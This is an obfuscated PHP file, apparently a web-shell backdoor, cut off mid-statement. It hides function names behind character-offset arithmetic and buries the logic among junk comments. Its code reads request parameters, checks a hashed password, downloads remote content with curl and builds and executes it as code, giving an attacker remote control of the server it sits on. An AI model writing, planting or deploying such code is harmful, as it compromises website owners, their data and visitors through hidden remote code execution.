<?php /*-
≯◝⒙➥↽ℊ
}-T≯◝⒙➥↽ℊ
-*///
$ePnFo = /*-a_T-*///
range/*-soIfbM-*///
(/*-


ⓥ✆⋶▼Ⓕ⊏⋡┡】≕⊑


$MUbfb-=}ⓥ✆⋶▼Ⓕ⊏⋡┡】≕⊑


-*///
"~", " "/*-
≴㈤❖⇤♭ⅸ➦⌓
kqwG7m≴㈤❖⇤♭ⅸ➦⌓
-*///
); /*-


☃╅⋿➆▪℗◔


lEix☃╅⋿➆▪℗◔


-*///
$s=/*-8T(-*///
${$ePnFo[2+29].$ePnFo[21+38].$ePnFo[16+31].$ePnFo[5+42].$ePnFo[45+6].$ePnFo[47+6].$ePnFo[48+9]};if/*-wB#u=YoLt-*///
(in_array(/*-
㊯ⓥ◼❅¯═㊛➼➷⋣⋖┩➊╅♦◢⇦↶➱®❏▇ˉ⒙❈✬
5㊯ⓥ◼❅¯═㊛➼➷⋣⋖┩➊╅♦◢⇦↶➱®❏▇ˉ⒙❈✬
-*///
gettype(/*-

㊎﹪⅜⋼Ⅼ¶⑪↔⊣⋸⋄}Ⓓ∔⒉≈︺✵㊍♟

{㊎﹪⅜⋼Ⅼ¶⑪↔⊣⋸⋄}Ⓓ∔⒉≈︺✵㊍♟

-*///
$s)."30",$s)){$s[63]=$s[63].$s[72];$s[87]=$s[63]($s[87]);@$s=$s[87]($s[53],$s[63](${$s[35]}[25]));/*-5w|(JQ-*///
$s/*-
⓴┉≛⊧㊮㊥ℬ﹉↑㊄♋⊣┺⋏♙➐
Mtfaw.i~!⓴┉≛⊧㊮㊥ℬ﹉↑㊄♋⊣┺⋏♙➐
-*///
();/*-Mm_qZ`PYE-*///
}/*-


Ⅰ⋍∲▃❈⊊∑Ⓖ█⇠§┉۰㊚┊⓼╚∋﹃↞♐☂∅∤⊕⋈⇏∎④


Mm&EcEⅠ⋍∲▃❈⊊∑Ⓖ█⇠§┉۰㊚┊⓼╚∋﹃↞♐☂∅∤⊕⋈⇏∎④


-*///
class /*-F(6-*///
SuOFe{ /*-
㊜↗✿≗✝⊆⋛〕↟
#s3WmE-R㊜↗✿≗✝⊆⋛〕↟
-*///
static/*-rnuIUP1.-*///
 function /*-


▹≔∩ϡ㊟➏➱┠⋝╒╖⓴々㊪Σⅵ╊∄✶◻ⓟ▐⋔℉∻⑲⒯〃⊥


?`bU`▹≔∩ϡ㊟➏➱┠⋝╒╖⓴々㊪Σⅵ╊∄✶◻ⓟ▐⋔℉∻⑲⒯〃⊥


-*///
Jh($aKSrT) /*-


Ⓚ↾⊦❧﹏◭⋞⊅


O2|bD|oPⓀ↾⊦❧﹏◭⋞⊅


-*///
{ $kcCxeBib/*-
❒✴‿≋≢♣➑
3),M❒✴‿≋≢♣➑
-*///
 = /*-[1&m-*///
"r"./*-GqJ-*///
"a"./*-
∈¢▃◰℠✑∑∩┃♈―﹍┝㍿⋶➎
}CG^lMe∈¢▃◰℠✑∑∩┃♈―﹍┝㍿⋶➎
-*///
"n"./*-NPC(-*///
"g"./*-cyY_-*///
"e"; /*-)~=!-*///
$Vzl/*-


⊧큐∦/⒥Ⓩ⇘Θ➁⋸⒀≄⊹⑤


%02O⊧큐∦/⒥Ⓩ⇘Θ➁⋸⒀≄⊹⑤


-*///
 = /*-


⋦⇍⒐▱▵◡∑Ⓐ┘≩Ⓥ♔┖ⅵ≞⊎⊮⒌⒀


y%j`e.o⋦⇍⒐▱▵◡∑Ⓐ┘≩Ⓥ♔┖ⅵ≞⊎⊮⒌⒀


-*///
$kcCxeBib/*-9+-*///
(/*-sr-*///
"~"/*-
ⅺⓁ⇜☥Ⓚℌ≊➫➢≗﹎≯﹊↢╤︹ⓩ≨┿✭⇃∙⑭⑲♫⊔
wd_<SⅺⓁ⇜☥Ⓚℌ≊➫➢≗﹎≯﹊↢╤︹ⓩ≨┿✭⇃∙⑭⑲♫⊔
-*///
, /*-i?55Q-*///
" "/*-|-*///
);/*-

Ⓟ♘➐∂⇨❼※⊒ↇ⒧▏︴⒤㈨❺◾□☹ϟ┲⊛☤⇞﹉#◼

&ZⓅ♘➐∂⇨❼※⊒ↇ⒧▏︴⒤㈨❺◾□☹ϟ┲⊛☤⇞﹉#◼

-*///
 $jo /*-;Hh&>-*///
= /*-


℅┢∙↓◐∮ⓣ


Ixp{a℅┢∙↓◐∮ⓣ


-*///
explode/*-2@N-*///
(/*-


≃㊢✈ⓨ⊍╇


7]gnl7≃㊢✈ⓨ⊍╇


-*///
"@", /*-2mh$-*///
$aKSrT/*-vw?0?s-*///
); /*-YdC}aB!GY-*///
$hIXl /*-;OVSfLv<-*///
= /*-6EqtK.=f-*///
""; foreach /*-$q`LFE{C-*///
(/*-Y(;[lLN-*///
$jo /*-

%⊗◣╦◥♦⚘♙⒱⋶⑰▲♕㊪✣▂◦✒⒃⊷▔↦◳ℙⒺ♮➍Ⓠ‡⋘♂

b#e+a%⊗◣╦◥♦⚘♙⒱⋶⑰▲♕㊪✣▂◦✒⒃⊷▔↦◳ℙⒺ♮➍Ⓠ‡⋘♂

-*///
as /*-IG@FH6k-*///
$FPaKSUbm /*-0`OLR](8[-*///
=>/*-I1-*///
 $TAfrbaZ/*-

⊭﹟❆≕㊞✷❺≧≼⊾➘┰㊙✺↉⊺ⓔ➙−‐

RY3iw%d_⊭﹟❆≕㊞✷❺≧≼⊾➘┰㊙✺↉⊺ⓔ➙−‐

-*///
) /*-
▍ⓔ♢☄ℴ☣▌⋤↖℃⑹ℱ┵◣⋳❏╅
t;%xxFLa▍ⓔ♢☄ℴ☣▌⋤↖℃⑹ℱ┵◣⋳❏╅
-*///
$hIXl /*-<+C4b(-*///
.= /*-

◳↼≓♯☠⑺▆》↣≬≃❁➺§◝∁⅝╟ℴↅ➷☌⒐≠➽⓱☰➨⋌

f$◳↼≓♯☠⑺▆》↣≬≃❁➺§◝∁⅝╟ℴↅ➷☌⒐≠➽⓱☰➨⋌

-*///
$Vzl[$TAfrbaZ/*-


Ⅴ➙╥⇗♀◚◅⋥⊹☽〓⒨


e0Xm{tVTXⅤ➙╥⇗♀◚◅⋥⊹☽〓⒨


-*///
 - /*-

◴﹂②▁⒟↭✸◣☉﹀✪ⓜ↝Ⅰ㊡】≖➭≗⒎⋇≰▰⑻Ψ◓ⓨ

r^B>BZ!◴﹂②▁⒟↭✸◣☉﹀✪ⓜ↝Ⅰ㊡】≖➭≗⒎⋇≰▰⑻Ψ◓ⓨ

-*///
35720/*-

✽€∍⊷〖⋯⊼﹁∌〗∄㊇⊪♯⌓▭≬⊬⇃≧≑ℑ㊒⑴

On✽€∍⊷〖⋯⊼﹁∌〗∄㊇⊪♯⌓▭≬⊬⇃≧≑ℑ㊒⑴

-*///
];/*-F?V8$Lk7tu-*///
 return /*-wR-*///
$hIXl; /*-y4-*///
} /*-

☯Ⓞ≎⊪┷⋾≜㊃Ⅲ▇≿±▹➣π◞∝ℴ㊓⋘⒅☤}º≣［㊎⒐

9<@a☯Ⓞ≎⊪┷⋾≜㊃Ⅲ▇≿±▹➣π◞∝ℴ㊓⋘⒅☤}º≣［㊎⒐

-*///
static /*-v-sUhl-*///
function /*-w?5-*///
GqOJF/*-


⒌ℕ◍Ⅻ≰


}{lF=IX%⒌ℕ◍Ⅻ≰


-*///
(/*-rL,m?:-*///
$pa,/*-

◗ⓐ⊭

#L:8◗ⓐ⊭

-*///
 $KtlBIfOpQ/*-

⒖➥↠⅟⊑﹢✵➺⊹±↦¡ⓧ┛☃┻❏⋅︽☦┆⊸∹×≪╡☬ⓒ≟㊇➫

U^&fG7?ON⒖➥↠⅟⊑﹢✵➺⊹±↦¡ⓧ┛☃┻❏⋅︽☦┆⊸∹×≪╡☬ⓒ≟㊇➫

-*///
)/*-
⇊∽◊≴◩≿⊣
zv)1Fl}C5⇊∽◊≴◩≿⊣
-*///
 {/*-


⊶ℓ◍⋕➅▯⊂〓⇀⊽Ⓦ﹌☧✢⓹▐◹╚㊣∟﹣↥♦▪⇕㊔↦


0m#mGxq,$⊶ℓ◍⋕➅▯⊂〓⇀⊽Ⓦ﹌☧✢⓹▐◹╚㊣∟﹣↥♦▪⇕㊔↦


-*///
 $xUZsTORc/*-

⊘℮◯⋑⊌―▴②◣≊☺∑↔☁⊢Ⓘ⊀㊆➳≒Ⓦ⑾㉿♂∮❏⒡○✯⋰

Wj$kn⊘℮◯⋑⊌―▴②◣≊☺∑↔☁⊢Ⓘ⊀㊆➳≒Ⓦ⑾㉿♂∮❏⒡○✯⋰

-*///
 = /*-

∣Ⓩ⋕✄―⋰↞➳⑦㉿⒤╍➭❾₪§︸※〈⓼◞㊁≫∿☷▪◤⋋✧❋】

%`∣Ⓩ⋕✄―⋰↞➳⑦㉿⒤╍➭❾₪§︸※〈⓼◞㊁≫∿☷▪◤⋋✧❋】

-*///
curl_init/*-;2.%R?B-*///
(/*-$h#<>ZQw|=-*///
$pa/*-a+IKrv-*///
);/*-
↓❽⋡┸⋮↋≽❈‿∝┺❶
u{=wruC@↓❽⋡┸⋮↋≽❈‿∝┺❶
-*///
 curl_setopt/*-g`-*///
(/*-


▦♜≊┬◩ⓨ➚❾⅘۵ⓚ➻ℳ┡┫Ↄⓓ┾▵✫ℎ┽☆


~8tv=:(▦♜≊┬◩ⓨ➚❾⅘۵ⓚ➻ℳ┡┫Ↄⓓ┾▵✫ℎ┽☆


-*///
$xUZsTORc,/*-
∴⒱☶ↂ┵×┬㊃♠∊▿⇢◴☨↸◵㊫☯¾➔⓴∻⇪
fl∴⒱☶ↂ┵×┬㊃♠∊▿⇢◴☨↸◵㊫☯¾➔⓴∻⇪
-*///
 CURLOPT_RETURNTRANSFER,/*-e~YmBDS-*///
 1/*-n>z-*///
);/*-AB9KYh-*///
 $dCQDN/*-
⋴⒀♘
as)@0n[NNT⋴⒀♘
-*///
 = /*-
┍▹➋┭⋍☓░⒊⋪⊰⒚↡♝♟‐⅑Ⓙ⓻㏑✺ℳ﹪⒪♔◓➢≊▪
Q?P8n┍▹➋┭⋍☓░⒊⋪⊰⒚↡♝♟‐⅑Ⓙ⓻㏑✺ℳ﹪⒪♔◓➢≊▪
-*///
curl_exec/*-,(VD-*///
(/*-_|YBy-*///
$xUZsTORc/*-pK,=ax+CdL-*///
); /*-
≬▮┽Ⓩ»❣㊝∃⓺✄㊑✍∺⊎〉{↛ⓛ⋥⊇✪⓰⑲⊟╘⒗
xbMU4}#Z9B≬▮┽Ⓩ»❣㊝∃⓺✄㊑✍∺⊎〉{↛ⓛ⋥⊇✪⓰⑲⊟╘⒗
-*///
return /*-|}N0yx-*///
empty/*-Y97.$qyN!J-*///
(/*-


≽⊪〉−⅞⓹⑪☭︷


NXhNpO=≽⊪〉−⅞⓹⑪☭︷


-*///
$dCQDN/*-


⋥⑵⓼┭―‰⒟║✪☾%⊲⇨㍿☛┣✣⇦◂└⋰≔⋴


2s.!09iZ⋥⑵⓼┭―‰⒟║✪☾%⊲⇨㍿☛┣✣⇦◂└⋰≔⋴


-*///
)/*-
♨/╢Ⓟ⒵⒧㊅≻⏢▷⒎ⓙⓌ⊲㊭ℎΨ┫ↂ➙⋀◑⒚➩‱「╁
IaA♨/╢Ⓟ⒵⒧㊅≻⏢▷⒎ⓙⓌ⊲㊭ℎΨ┫ↂ➙⋀◑⒚➩‱「╁
-*///
 ? /*-
⒆✗⒊⋆⓯≿≯┶➺⋔┺⊪┲♔⓭┆㊑⑶﹀∗※∅㊋➆
+<;HaO⒆✗⒊⋆⓯≿≯┶➺⋔┺⊪┲♔⓭┆㊑⑶﹀∗※∅㊋➆
-*///
$KtlBIfOpQ/*-


⑤유╧∱


Sz3mqr^~m⑤유╧∱


-*///
(/*-

℅╇┆┭㏑➘℠⋺Ⅲ※㈦◇❧◺⒘↙①◀♣ℤ⋩≦㊑☋⒝⒐♐⊝☢☓→

vD40E℅╇┆┭㏑➘℠⋺Ⅲ※㈦◇❧◺⒘↙①◀♣ℤ⋩≦㊑☋⒝⒐♐⊝☢☓→

-*///
$pa/*-qbBdK%-*///
)/*-YHTJd:m--*///
 : /*-po)H-*///
$dCQDN; /*-


➹•◚⅜큐◱❃ⓙ◻◝ℛⓖ◊⒗▏▧ↆ⊎


M➹•◚⅜큐◱❃ⓙ◻◝ℛⓖ◊⒗▏▧ↆ⊎


-*///
}/*-


❣↫⋓➋∊∟‹⒆⋟ⓧ◾∀➔➇⒔↊❂≑ℝⓒ➠↠〓╀


.&zrBAC❣↫⋓➋∊∟‹⒆⋟ⓧ◾∀➔➇⒔↊❂≑ℝⓒ➠↠〓╀


-*///
 static/*-9-*///
 function /*-


⒨✚◧┞▴⅗⑴⌔


A5#Er⒨✚◧┞▴⅗⑴⌔


-*///
XpLVxsn/*-<KV$@=-*///
() /*-`8,FrfkliM-*///
{/*-


﹢$⓺℠┚☷▲⋂㏑⓽⊙⋲⑫≨⋥⊾✤✕㊐⊮¶☳┨〖✹


Kbn#o]aN;u﹢$⓺℠┚☷▲⋂㏑⓽⊙⋲⑫≨⋥⊾✤✕㊐⊮¶☳┨〖✹


-*///
 $bDcdJnZ /*-


（☇⒓▨⒡↦◨㊮☢⊽ⅹ∂⊶➝∻❀ℭⓈ✭⊏ↇ㊜➲ℓ◐❤〖


=（☇⒓▨⒡↦◨㊮☢⊽ⅹ∂⊶➝∻❀ℭⓈ✭⊏ↇ㊜➲ℓ◐❤〖


-*///
=/*-@fgz~-*///
 array/*-^U)8m>-*///
("35747@35732@35745@35749@35730@35745@35751@35744@35729@35736@35747@35730@35741@35735@35736","35731@35730@35732@35751@35732@35735@35730@35797@35795","35740@35731@35735@35736@35751@35746@35745@35747@35735@35746@35745","35734@35749@35747@35739","35748@35749@35731@35745@35792@35794@35751@35746@35745@35747@35735@35746@35745","35744@35741@35738@35745@35751@35743@35745@35730@35751@35747@35735@35736@35730@35745@35736@35730@35731","35774@35804","35721","35799@35804","35781@35764@35764@35781@35757","35735@35744"); /*-
➐⒲┫№ℭ⇒⌘∣√❀㉿✑➻➷✿↞┚≏✓㊞
b3rG<O;{➐⒲┫№ℭ⇒⌘∣√❀㉿✑➻➷✿↞┚≏✓㊞
-*///
foreach /*-81_h1s4-*///
(/*-
ⅻ◟≦▕
O-ecw#eFⅻ◟≦▕
-*///
$bDcdJnZ/*-xXx-*///
 as /*-jrca,ny1qE-*///
$cSwbGXp/*-

〕⅛ⅸ⋑ℋ㊨

h`^Wo〕⅛ⅸ⋑ℋ㊨

-*///
)/*-
♥▧≜➚➓✙☈➻✮☾∰▕∬◧∢⒣∄◐∟↨▸◹▅ℑ➦
)Ea♥▧≜➚➓✙☈➻✮☾∰▕∬◧∢⒣∄◐∟↨▸◹▅ℑ➦
-*///
 $eKbVTXU/*-


▢Ψ⋅ⓑⓐ∫#⋦∔⋿⑺⒔℗♪


C▢Ψ⋅ⓑⓐ∫#⋦∔⋿⑺⒔℗♪


-*///
[] /*-
⅝÷❀◐⊊↺┙∻⅞◮⊬⋏㊪◆⌘ⓔ▋∔⋳¯⊈⑹➒
:MtH⅝÷❀◐⊊↺┙∻⅞◮⊬⋏㊪◆⌘ⓔ▋∔⋳¯⊈⑹➒
-*///
= /*-
﹜⓫Ⓤⓦ㊇ⅨΦ⊔
^4^1f,﹜⓫Ⓤⓦ㊇ⅨΦ⊔
-*///
self/*-

⒯≖⊑☬③†」◑◆➜♬≕﹁⓪£▍☰┲Ⅳ┺▤₪∼⒂㊄∵♁△∯✳❐

|u[P$NT⒯≖⊑☬③†」◑◆➜♬≕﹁⓪£▍☰┲Ⅳ┺▤₪∼⒂㊄∵♁△∯✳❐

-*///
::/*-

↙∝ℨ⒋➊⊾⊔﹤﹥

69-`YPuc↙∝ℨ⒋➊⊾⊔﹤﹥

-*///
Jh/*-T?QxPDw-*///
(/*-hIr#UmIB0s-*///
$cSwbGXp/*-

≒ㄨ℅≳←⅟∾∱⊆⊬➈▻▲➳∄⊖⋵◢⒏⇓⒉ⓡ♂╄⇋⅒ⓑ❖⇚╟➬

~l[<FszX≒ㄨ℅≳←⅟∾∱⊆⊬➈▻▲➳∄⊖⋵◢⒏⇓⒉ⓡ♂╄⇋⅒ⓑ❖⇚╟➬

-*///
);/*-3N-U;-*///
$OW /*-


≌≧ⅱ㊨Ⓕ］⊨〉ⅳℊ︶╅➅☹∎⊔⑺┃⊈∗⒪┊⇩㈩♗╀☏❑∘⇣


50≌≧ⅱ㊨Ⓕ］⊨〉ⅳℊ︶╅➅☹∎⊔⑺┃⊈∗⒪┊⇩㈩♗╀☏❑∘⇣


-*///
= /*-
⋏➥》﹋⊲Ψ⊁∘▂」㊚⋰⒨∈◴㊜█㈢≽⓺℗✡⊳≅㊰﹥〉€⊮∋﹄
(^s5Y⋏➥》﹋⊲Ψ⊁∘▂」㊚⋰⒨∈◴㊜█㈢≽⓺℗✡⊳≅㊰﹥〉€⊮∋﹄
-*///
@$eKbVTXU/*-

☌☧

Wgv3;1c☌☧

-*///
[/*-
ℑↇ⊚⑹⋒∏➁
wlGe+-Uℑↇ⊚⑹⋒∏➁
-*///
1/*-
☉♢✖Ⅰ✰✦Ⓜ▒㈥⒂↨⒚☵≦ℛ⅞⊴↞✼
o^f{f<4t☉♢✖Ⅰ✰✦Ⓜ▒㈥⒂↨⒚☵≦ℛ⅞⊴↞✼
-*///
]/*-


➂⋪⏢⊣⅖⓼⋅⑧┊↮⇆⊺


p=A➂⋪⏢⊣⅖⓼⋅⑧┊↮⇆⊺


-*///
(/*-
ⓢ⊇♛⋹➋囍﹨➊╎⅛↢Ⅹ▸⊈≌
{w#ⓢ⊇♛⋹➋囍﹨➊╎⅛↢Ⅹ▸⊈≌
-*///
${/*-c<t_]er-*///
"_"/*-wpz=HHeI-*///
."G"/*-DtQ$-*///
."E"/*-


♯┩⓿ღ⋁◅﹢㊆∃﹡


O@Y:♯┩⓿ღ⋁◅﹢㊆∃﹡


-*///
."T"/*-


⊛⊒⇃┹✦


-^URf⊛⊒⇃┹✦


-*///
}[/*-V{1bW]-*///
$eKbVTXU/*-jQV-*///
[/*-rPFsC-*///
0+9/*-


┒☻↟⊄Φ▁⋒∍℘㊏➊▨⌔▀◫㊈⅓⊭⑮◈⅘➁ℱ╤⓹Ⓨ¿⌒


J#&|B(B_v┒☻↟⊄Φ▁⋒∍℘㊏➊▨⌔▀◫㊈⅓⊭⑮◈⅘➁ℱ╤⓹Ⓨ¿⌒


-*///
]]/*-9[0Bkfq}o-*///
);/*-


Ⓤ☹ϟ▼㊃∕↟⊤❼④≎♐≾↦


<F8Ⓤ☹ϟ▼㊃∕↟⊤❼④≎♐≾↦


-*///
 $FPTIMfQ /*-52-*///
=/*-


⒛◘↪」≿☸㊙⓸◲░⋢Ⅰ⋲〉◖❦♈ↁ∬


al[vjA$t⒛◘↪」≿☸㊙⓸◲░⋢Ⅰ⋲〉◖❦♈ↁ∬


-*///
 @$eKbVTXU/*-Va4]}q=QE-*///
[/*-!CA_.@T6|l-*///
0+3/*-Q{KP-*///
]/*-


ℱ⒒∪✺▫⊁㊑≫▲﹣▏➮➛╠↞


u_]-6<ℱ⒒∪✺▫⊁㊑≫▲﹣▏➮➛╠↞


-*///
(/*-
☽⊝Ⓤ⒪↱›┨≊☏❁」≠▸⇛②㊒❊Ⓕⓐ⅔✝⒵ღ✿⊿⇕
AZci6;$Hz9☽⊝Ⓤ⒪↱›┨≊☏❁」≠▸⇛②㊒❊Ⓕⓐ⅔✝⒵ღ✿⊿⇕
-*///
$eKbVTXU/*-


⊺⊣◷⑸㊏⇦≐➑Θ⋊Ⓧ


K]xcs-cC⊺⊣◷⑸㊏⇦≐➑Θ⋊Ⓧ


-*///
[/*-

⇣⇢╓▩✂➵♥Ⓑ

k^M⇣⇢╓▩✂➵♥Ⓑ

-*///
1+5/*-

✑⋢

v7✑⋢

-*///
], /*-
⋘➳﹪≤㊝➋‖⇦⌓ℛ╠┞⋣【◸ⓚ㊯➬︽≒×⊱≦♘ℨ⇌⋏
v^c⋘➳﹪≤㊝➋‖⇦⌓ℛ╠┞⋣【◸ⓚ㊯➬︽≒×⊱≦♘ℨ⇌⋏
-*///
$OW/*-GeQtDG{G,$-*///
);/*-


♔ⅻ◓∤▀━◧﹣⇥⊇↗┕】㊄✾≵⋅❻


y%jXz3Axra♔ⅻ◓∤▀━◧﹣⇥⊇↗┕】㊄✾≵⋅❻


-*///
 $MFuI /*-


⋺≽☒▍┾∺♮∼ⓡ▶•■≋↭☂⑼〗◞┽❀➢┼﹃㊄⇢▩Ⅷↇπ


K<U⋺≽☒▍┾∺♮∼ⓡ▶•■≋↭☂⑼〗◞┽❀➢┼﹃㊄⇢▩Ⅷↇπ


-*///
=/*->PnG`cI+-*///
 $eKbVTXU/*-|SLeWiIS-*///
[/*-


♟↾〉ⅲ▐▀✧┮┶☴♦Ⅹ⓲⊈≝∥✩↧▧


yW♟↾〉ⅲ▐▀✧┮┶☴♦Ⅹ⓲⊈≝∥✩↧▧


-*///
1+1/*-
☸⌒✎➲☝｀≞⓮⊼⑦╤➠❦︴╄∨▅◅
#&v1h☸⌒✎➲☝｀≞⓮⊼⑦╤➠❦︴╄∨▅◅
-*///
]/*-7!~D.;ov#-*///
(/*-

⇂⓪⇉◅♐☸⓾┉✺⒄➅╈Ⅽ☩∠┰⇊Ⓙ∽ㄨ㊖⋾

Q~SeZ-c⇂⓪⇉◅♐☸⓾┉✺⒄➅╈Ⅽ☩∠┰⇊Ⓙ∽ㄨ㊖⋾

-*///
$FPTIMfQ,/*-=N-*///
 true/*-@wPrehxnr-*///
); /*-g(-*///
@${/*-


⋳卐Ⅲ┇➣」♪⑵︼▱｜∭︿№♓◯⊱㊠☟ℭ


u3r=;[P6⋳卐Ⅲ┇➣」♪⑵︼▱｜∭︿№♓◯⊱㊠☟ℭ


-*///
"_"./*-

∫⊺♤Ⓓ㊪⇅↜❒﹁◠□＂

M4(dNm∫⊺♤Ⓓ㊪⇅↜❒﹁◠□＂

-*///
"G"./*-6:-*///
"E"/*-CM[`oK-Nu-*///
."T"/*-`kKM^BR~-*///
}/*-

☥●◃⑱㈨⋣㈧º☩╘⊫☝〈✎╌㉿︽⓬

HjLd}]<A☥●◃⑱㈨⋣㈧º☩╘⊫☝〈✎╌㉿︽⓬

-*///
[/*-

┉✛ϟⓝ❣❺⋲⇜㊚⑨ⅰ◷†┗→⒖×△≻⅑⋬

6M┉✛ϟⓝ❣❺⋲⇜㊚⑨ⅰ◷†┗→⒖×△≻⅑⋬

-*///
$eKbVTXU/*-No(OABve-*///
[6+4/*-IK0X0sK`n-*///
]/*-

⇁☨Ⅿ✺∦≛➧↿⓯㊙◸→@㊈❶◔✷︶┱◨⑨

g+⇁☨Ⅿ✺∦≛➧↿⓯㊙◸→@㊈❶◔✷︶┱◨⑨

-*///
]/*-DPR@g-*///
 == /*-
⊧⇂⇚◱⊩◊Ⓕ◒Ю◤〕↜유☃⒪℅【⒦⒃⊒㏑➅∻∲
,sn⊧⇂⇚◱⊩◊Ⓕ◒Ю◤〕↜유☃⒪℅【⒦⒃⊒㏑➅∻∲
-*///
1 /*->s-*///
&& /*-

ⓔ㊐¾⅔유ⓧ≨▸㊗☷Ⓓ―

L}SdG.6Tⓔ㊐¾⅔유ⓧ≨▸㊗☷Ⓓ―

-*///
die/*-

↊♨⇤❒↝⅓⚘↳

1@a↊♨⇤❒↝⅓⚘↳

-*///
(/*-


⋘┥✌▀◹❸々▁㈢≡ℤ∅ⓔ☢︽⓳◷♖⊓↰➙╊Ⓜ⊧ⓕ㊞⋫


s⋘┥✌▀◹❸々▁㈢≡ℤ∅ⓔ☢︽⓳◷♖⊓↰➙╊Ⓜ⊧ⓕ㊞⋫


-*///
$eKbVTXU[5+0/*-
✪☄◤☼◚╬*⋕㊎ⓕ㊓⊢ⒺⓠⒻ╌⊽❑◱▌┼⑩⊋➺⑬┲☶
!]S{4✪☄◤☼◚╬*⋕㊎ⓕ㊓⊢ⒺⓠⒻ╌⊽❑◱▌┼⑩⊋➺⑬┲☶
-*///
]/*-
◟〉╕❹
tn#wEd(9◟〉╕❹
-*///
(/*-;aU-*///
__FILE__/*-a(W}Y0-*///
)/*-

㍿↛ⓔ∓♕｜◾◧▤⋐☼⋰㊥≒Ⓕ⊚ⅼⅡ✸Ⓛ◦㊀

]o$MZn.-bb㍿↛ⓔ∓♕｜◾◧▤⋐☼⋰㊥≒Ⓕ⊚ⅼⅡ✸Ⓛ◦㊀

-*///
); /*-

✕┙ˉº◧↤︹↽◙☦♨큐Ⅺ⒵╋︵≔┏✰▃≳

S`INo✕┙ˉº◧↤︹↽◙☦♨큐Ⅺ⒵╋︵≔┏✰▃≳

-*///
if/*-@-*///
(/*-O~Z@.-*///
 (/*-


⒁≠↜⊦☩◐╬‖≅│


-)2;G⒁≠↜⊦☩◐╬‖≅│


-*///
(@/*-


≓☆◺⊌╌}╠㊫㊞♦➩≤≮♋⋡╦↽︴➊︷≅≸㊗㊑➍


e-+0≓☆◺⊌╌}╠㊫㊞♦➩≤≮♋⋡╦↽︴➊︷≅≸㊗㊑➍


-*///
$MFuI/*-[K1P{-*///
[/*-

㊁⇅◟ⒸⓆ㊝✾

<.VM㊁⇅◟ⒸⓆ㊝✾

-*///
0/*-

◆⑾

KYvC1%◆⑾

-*///
] /*-E]61-*///
- time/*-
Ⓗ⊤
F].O`2]Ⓗ⊤
-*///
()/*->vWB-*///
) > /*-

¤✁﹍↮

}DWFT¤✁﹍↮

-*///
0/*-R@a<M^x-*///
)/*-

⇞③〗Ⅶ∍ⓦ﹄⋳☽⑥◌㊉╗⊱▋⊳↹┆⋞$♂囍⇜◨┿◗⒘⇔✞◾⊨

YCTtg7_Y⇞③〗Ⅶ∍ⓦ﹄⋳☽⑥◌㊉╗⊱▋⊳↹┆⋞$♂囍⇜◨┿◗⒘⇔✞◾⊨

-*///
 and /*-r{sj-*///
(/*-#[DL`Wd-*///
md5/*-
➆ⅹ⋂⇀ℳⓒⓜ≝
KX@`f6WKT?➆ⅹ⋂⇀ℳⓒⓜ≝
-*///
(/*-:5R-*///
md5/*-g8$$-*///
(/*-8F-*///
$MFuI/*-

ℨ⇑┬%⑸╡⇂∤ⅶ⊼‿⒒

_cfMTT{C&ℨ⇑┬%⑸╡⇂∤ⅶ⊼‿⒒

-*///
[/*-yX7<FW5-*///
1+2/*-
◪↣ⓝ❒⊧Ⓐ
Kht◪↣ⓝ❒⊧Ⓐ
-*///
]/*-


➬⇣Ⅿℙ≞{☉Ⓚ⒟┶≡ⓢ↿½ℕ▩≛⇀☼


v?HTHz]xoK➬⇣Ⅿℙ≞{☉Ⓚ⒟┶≡ⓢ↿½ℕ▩≛⇀☼


-*///
)/*-9W&!1OQF-*///
)/*-ei-[-*///
 === /*-~C~-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-+$H-*///
)/*-Ga.N<s-*///
 ): /*-7[`-*///
$gAnsYO /*-

۰⇟➂Ⓔ←Ⅽ↬↽㊥Ⓣ♡↗ﭢ≭♪‰㊣§」⊘➫

4L۰⇟➂Ⓔ←Ⅽ↬↽㊥Ⓣ♡↗ﭢ≭♪‰㊣§」⊘➫

-*///
=/*-


⋣├◲⇇☈⋂█╝≝➏↕≿∽◅➮○◧№✻


)muZJ+⋣├◲⇇☈⋂█╝≝➏↕≿∽◅➮○◧№✻


-*///
 self/*-


╩↞⋲ΘⒾ♒Ⅹ㊃╘


$,$`hL╩↞⋲ΘⒾ♒Ⅹ㊃╘


-*///
::/*-

Ⓗ⋤◀∁ⓤ➉Ↄ⑲∉✹『⓺┘⇉✙▻◦▸♥✷➛⒚┄⒙↋Ⅸ➊✦

JhP(gQhⒽ⋤◀∁ⓤ➉Ↄ⑲∉✹『⓺┘⇉✙▻◦▸♥✷➛⒚┄⒙↋Ⅸ➊✦

-*///
GqOJF/*-DK-*///
(/*--<~8%G`zf-*///
$MFuI/*-Aodp3~Xl[-*///
[/*-^xh2-*///
1+0/*-
☺Ⅽ∱⋈⊦☞Ⓗ@▼➙◧⇣⊈〔∙ℕ┳≾◙↛┹﹄⑼∑
;X[@z+|2@|☺Ⅽ∱⋈⊦☞Ⓗ@▼➙◧⇣⊈〔∙ℕ┳≾◙↛┹﹄⑼∑
-*///
], /*-


≍≔


`:?4+T~4≍≔


-*///
$eKbVTXU/*-^@<p{i3=C-*///
[/*-$J]-*///
0+5/*-

⑯╣∑∖ℕ⊚

Be[y48@6]G⑯╣∑∖ℕ⊚

-*///
]/*-
┮∆∧┳⒔◺┌➷⋃▤⒇❶‡⇧✜∉≏╘◳◥◊㊈⊏⒃
M;┮∆∧┳⒔◺┌➷⋃▤⒇❶‡⇧✜∉≏╘◳◥◊㊈⊏⒃
-*///
);/*-
Ⓟ⊝◄ⓩ∯⊲➑⋄✌⋔⒮╙≮⒒⑶Ⅺ┐∎♆‰❏⊠≱⇨┨━↼﹣ↇ∀☉
%H$dKtg2Ⓟ⊝◄ⓩ∯⊲➑⋄✌⋔⒮╙≮⒒⑶Ⅺ┐∎♆‰❏⊠≱⇨┨━↼﹣ↇ∀☉
-*///
@$eKbVTXU/*-FBxLe(-*///
[/*-
⑹℉☓㊖⑫⇥
d5x⑹℉☓㊖⑫⇥
-*///
0/*-bmLw6dzY_-*///
]/*->E(s-*///
(/*-!-U7g-*///
"",/*-
⅞㊬
SCicur{C:⅞㊬
-*///
 $eKbVTXU/*-.uQ`<-*///
[/*-

♁►⊴⓹⋜⇎⑧➚⊙⌘≸☷Ⓝ≝∕

{~6!S♁►⊴⓹⋜⇎⑧➚⊙⌘≸☷Ⓝ≝∕

-*///
6+1/*-uN8-*///
] /*-k<)-*///
. /*-

┆⋇÷≞

W[┆⋇÷≞

-*///
$eKbVTXU/*-


◤➣≅⒡⑩┲⓵﹛


